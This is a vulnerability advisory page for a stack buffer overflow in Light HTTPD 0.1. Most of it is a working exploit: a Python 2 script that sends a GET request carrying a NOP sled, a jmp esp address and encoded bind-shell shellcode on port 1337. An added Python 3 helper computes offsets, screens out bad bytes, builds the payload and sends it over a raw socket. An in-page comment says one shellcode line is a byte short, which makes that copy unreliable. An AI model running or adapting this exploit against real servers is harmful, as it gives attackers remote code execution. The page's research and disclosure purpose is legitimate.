Light HTTPD Stack Buffer Overflow Vulnerability

Source: Internet
Author: User

Release date:
Updated on: 2013-04-27

Affected Systems:
Light HTTPD 0.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59495
 
Light HTTPD is a project to improve ghttpd to include server-parsed elements, htaccess, content management, and on-page MySQL queries.
 
Light HTTPD 0.1 does not bound the length of the request path when it handles an HTTP GET request, so an overlong path overflows a fixed-size stack buffer and overwrites the saved return address (the public exploit below places a jmp esp address 258 bytes into the path on Windows XP SP2, 255 bytes on SP3). Successful exploitation allows arbitrary code execution in the context of the server process, or a denial of service by crashing it.
 
Source: Jacob Holcomb

Test method:
--------------------------------------------------------------------------------

Alert

The following procedure may be offensive in nature and is intended only for security research and teaching. Use it at your own risk.
# Python 2 script (urllib2, raw_input, print statement) as published by the author.
import urllib2
from time import sleep

####################################################################################################
# Title ************************ Windows Light HTTPD v0.1 HTTP GET Buffer Overflow
# Discovered and Reported ****** 24th of April, 2013
# Discovered/Exploited By ****** Jacob Holcomb/Gimppy042
# Software Vendor ************** http://sourceforge.net/projects/lhttpd?source=navbar
# Exploit/Advisory ************* http://infosec42.blogspot.com/
# Software ********************* Light HTTPD v0.1
# Tested Platform ************** Windows XP Professional SP2
# Date ************************* 24/04/2013
#
# PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
####################################################################################################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# jmp esp ntdll 0x7c91fcd8 (little-endian "\xd8\xfc\x91\x7c")
# payload = "\x90" * 255 + "\xd8\xfc\x91\x7c" + "\x90" * 32 + shellcode


def targURL():
    # Loop until the user supplies a non-empty target that starts with "http://".
    # The rest of the script slices those seven characters off for display and
    # appends ":3000/" to reach the Light HTTPD listener.
    while True:
        url = raw_input("\n[*] Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1\n> ")
        if len(url) != 0 and url[0:7] == "http://":
            break
        else:
            print "\n[!] Target URL can't be null and must start with http:// [!]\n"
            sleep(1)
    return str(url)


def main():
    target = targURL()

    # Bind shell on TCP/1337, encoded once with shikata_ga_nai so that the bytes a raw
    # request path cannot carry (NUL, LF, CR, 0xff, space) never appear in it:
    # msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 R | msfencode -c 1 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff\x20" R
    shellcode = "\xb8\x3b\xaf\xc1\x8a\xdb\xcd\xd9\x74\x24\xf4\x5a\x29\xc9"
    shellcode += "\xb1\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x34\x4d\x34\x76"
    shellcode += "\xa2\x18\xb7\x87\x32\x7b\x31\x62\x03\xa9\x25\xe6\x31\x7d"
    shellcode += "\x2d\xaa\xb9\xf6\x63\x5f\x4a\x7a\xac\x50\xfb\x31\x8a\x5f"
    shellcode += "\xfc\xf7\x12\x33\x3e\x99\xee\x4e\x12\x79\xce\x80\x67\x78"
    shellcode += "\x17\xfc\x87\x28\xc0\x8a\x35\xdd\x65\xce\x85\xdc\xa9\x44"
    shellcode += "\xb5\xa6\xcc\x9b\x41\x1d\xce\xcb\xf9\x2a\x98\xf3\x72\x74"
    shellcode += "\x39\x05\x57\x66\x05\x4c\xdc\x5d\xfd\x4f\x34\xac\xfe\x61"
    shellcode += "\x78\x63\xc1\x4d\x75\x7d\x05\x69\x65\x08\x7d\x89\x18\x0b"
    shellcode += "\x46\xf3\xc6\x9e\x5b\x53\x8d\x39\xb8\x65\x42\xdf\x4b\x69"
    shellcode += "\x2f\xab\x14\x6e\xae\x78\x2f\x8a\x3b\x7f\xe0\x1a\x7f\xa4"
    shellcode += "\x24\x46\x24\xc5\x7d\x22\x8b\xfa\x9e\x8a\x74\x5f\xd4\x39"
    shellcode += "\x61\xd9\xb7\x55\x46\xd4\x47\xa6\xc0\x6f\x3b\x94\x4f\xc4"
    shellcode += "\xd3\x94\x18\xc2\x24\xda\x33\xb2\xbb\x25\xbb\xc3\x92\xe1"
    shellcode += "\xef\x93\x8c\xc0\x8f\x7f\x4d\xec\x5a\x2f\x1d\x42\x34\x90"
    shellcode += "\xcd\x22\xe4\x78\x04\xad\xdb\x99\x27\x67\x6a\x9e\xe9\x53"
    shellcode += "\x3f\x49\x08\x64\xba\xb0\x85\x82\xae\xd2\xc3\x1d\x46\x11"
    shellcode += "\x30\x96\xf1\x6a\x12\x8a\xaa\xfc\x2a\xc4\x6c\x02\xab\xc2"
    # As reproduced on this page the next line carries 13 bytes where every other line
    # carries 14, so this copy is probably one byte short of the encoded payload.
    # Regenerate the shellcode with the msfpayload/msfencode command above rather than
    # trusting this transcription.
    shellcode += "\xdf\xaf\x03\x85\xab\xa3\x97\xb4\xac\xe9\xbf\x95\x7a"
    shellcode += "\x35\xae\x54\x1a\x4a\xfb\x0e\xbf\xd9\x60\xce\xb6\xc1\x3e"
    shellcode += "\x99\x9f\x34\x37\x4f\x32\x6e\xe1\x6d\xcf\xf6\xca\x35\x14"
    shellcode += "\xcb\xd5\xb4\xd9\x77\xf2\xa6\x27\x77\xbe\x92\xf7\x2e\x68"
    shellcode += "\x4c\xbe\x98\xda\x26\x68\x76\xb5\xae\xed\xb4\x06\xa8\xf1"
    shellcode += "\x90\xf0\x54\x43\x4d\x45\x6b\x6c\x19\x41\x14\x90\xb9\xae"
    shellcode += "\xcf\x10\xd9\x4c\xc5\x6c\x72\xc9\x8c\xcc\x1f\xea\x7b\x12"
    shellcode += "\x26\x69\x89\xeb\xdd\x71\xf8\xee\x9a\x35\x11\x83\xb3\xd3"
    shellcode += "\x15\x30\xb3\xf1"

    # 7C941EED   FFE4   jmp esp   ntdll.dll (Windows XP SP2 build; address is build-specific)
    # Layout: 258 bytes of NOP sled up to the saved return address, the little-endian
    # jmp esp address, 32 NOPs so the landing point tolerates small stack shifts, then
    # the shellcode, which ends up at ESP when the overwritten return address is taken.
    payload = "\x90" * 258 + "\xED\x1E\x94\x7C" + "\x90" * 32 + shellcode
    port = ":3000/"
    sploit = target + port + payload

    try:
        print "\n[*] Preparing to send evil PAYLoAd to %s!\n[*] Payload Length: %d\n[*] Waiting..." % (target[7:], len(sploit))
        # urllib2 sends the path bytes as-is, so the sled, address and shellcode reach
        # the server unencoded. The 6-second timeout is the only way to notice that the
        # server stopped answering because the shellcode ran instead of the request handler.
        httpRequest = urllib2.Request(sploit)
        sploit = urllib2.urlopen(httpRequest, None, 6)
    except (urllib2.URLError):
        print "\n[!] Error. Please check that the Light HTTP Server is online [!]\n"
    except:
        print "\n[!] The server did not respond, but the payload was sent. F!ng3r$ Cr0$3d 4 c0d3 Ex3cut!0n! [!]\n"


if __name__ == "__main__":
    main()
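The script above hard-codes the distance to the saved return address (258 bytes on XP SP2, 255 on SP3 according to the Exploit-DB note) and relies on msfencode having stripped the five bad bytes. The helper below, added here as a worked example and not part of Jacob Holcomb's exploit or the Light HTTPD project, shows how those numbers are obtained and checked: it reproduces the Metasploit pattern_create/pattern_offset algorithm to recover the offset from the EIP value seen at the crash, verifies a return address and shellcode against the bad-byte list from the msfencode command, lays the payload out exactly as the script does, and assembles the raw GET request. It is written for Python 3 rather than the script's Python 2, so the request is built by hand over a socket instead of through urllib2 (which in Python 3 refuses non-ASCII URLs). The crash EIP value, the target host and the four-byte int3 stand-in used in place of real shellcode are constructed placeholders.

```python
import socket
import string
import struct

# Bytes the page's msfencode command tells the encoder to avoid: the bytes a raw
# request path cannot carry (NUL, LF, CR, space) plus 0xff.
BAD_CHARS = b"\x00\x0a\x0d\xff\x20"


def cyclic_pattern(length):
    """Metasploit pattern_create: 'Aa0Aa1Aa2...' in which every 4-byte window is
    unique (up to 20280 bytes), so the value that lands in EIP maps to one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip_value, length=20280):
    """Metasploit pattern_offset: given the EIP value read from the debugger at the
    crash, return how many bytes precede the saved return address."""
    needle = struct.pack("<I", eip_value)  # x86 is little-endian: reverse the register bytes
    offset = cyclic_pattern(length).find(needle)
    if offset < 0:
        raise ValueError("EIP value 0x%08x does not occur in the pattern" % eip_value)
    return offset


def find_bad_chars(blob, bad=BAD_CHARS):
    """Return the sorted list of forbidden byte values present in blob."""
    return sorted({b for b in blob if b in bad})


def build_payload(offset, ret_addr, shellcode, nop_pad=32, nop=b"\x90"):
    """Lay the overflow out as the page's exploit does: NOP sled up to the saved
    return address, the little-endian jmp esp address, a short NOP pad, then the
    shellcode. Refuses to build if the address or shellcode contains a bad byte."""
    addr = struct.pack("<I", ret_addr)
    for name, blob in (("return address", addr), ("shellcode", shellcode)):
        bad = find_bad_chars(blob)
        if bad:
            raise ValueError("%s contains bad bytes: %s" % (name, ["0x%02x" % b for b in bad]))
    return nop * offset + addr + nop * nop_pad + shellcode


def build_request(host, port, payload):
    """Raw HTTP/1.0 GET whose request path is the payload, the same shape urllib2
    produced for the Python 2 script."""
    return (b"GET /" + payload + b" HTTP/1.0\r\n"
            b"Host: " + ("%s:%d" % (host, port)).encode("ascii") + b"\r\n\r\n")


def send_request(host, port, request, timeout=6):
    """Deliver the raw request over TCP. No reply before the timeout is the expected
    outcome when the shellcode runs instead of the request handler. Network only."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


if __name__ == "__main__":
    XP_SP2_JMP_ESP = 0x7C941EED  # the ntdll.dll jmp esp address quoted on the page
    crash_eip = 0x41366941       # constructed: EIP as a 20280-byte pattern crash would report it
    offset = pattern_offset(crash_eip)
    # Constructed stand-in for shellcode; a real run regenerates the msfencode output.
    payload = build_payload(offset, XP_SP2_JMP_ESP, b"\xcc" * 4)
    print("offset %d, payload %d bytes" % (offset, len(payload)))
    print(build_request("192.168.1.1", 3000, payload)[:40])
```

Because the offset differs between the SP2 and SP3 builds the page quotes, re-derive it against the actual target with a pattern crash rather than trusting either constant, and do the same for the jmp esp address, which is only valid for the ntdll.dll build it was taken from. Running the bad-byte check over a freshly generated shellcode is the cheap way to confirm that msfencode honoured the -b list before a request is sent.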

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Light HTTPD
-----------
At the time of writing the vendor has not released a patch or upgrade. Users of the software should watch the vendor's project page for a fixed release and, until one is available, avoid exposing the server to untrusted networks:
 
http://sourceforge.net/projects/lhttpd?source=navbar
